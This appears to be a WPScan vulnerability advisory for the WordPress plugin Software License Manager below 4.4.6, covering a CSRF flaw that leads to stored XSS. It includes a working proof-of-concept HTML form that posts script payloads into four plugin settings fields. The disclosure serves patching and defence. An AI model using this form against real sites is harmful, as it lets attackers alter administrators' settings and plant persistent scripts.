WordPress Plugin Vulnerabilities
Software License Manager < 4.4.6 - CSRF to Stored XSS
Description
The plugin did not have CSRF check on its settings page, nor sanitisation when outputting user input back. Attackers could make a logged in administrator change the plugin's settings, and put XSS payload in them.
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wp_lic_mgr_settings" method="POST">
<input type="hidden" name="lic_creation_secret" value='"><script>alert(/XSS-1/)</script>' />
<input type="hidden" name="lic_verification_secret" value='"><script>alert(/XSS-2/)</script>' />
<input type="hidden" name="lic_prefix" value='"><script>alert(/XSS-3/)</script>' />
<input type="hidden" name="default_max_domains" value='"><script>alert(/XSS-4/)</script>' />
<input type="hidden" name="slm_save_settings" value=" Update Options" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in 4.4.6 References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Koken Tokuda
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-23 (about 3 years ago)
Added
2021-04-23 (about 3 years ago)
Last Updated
2022-03-05 (about 2 years ago)
WPScan 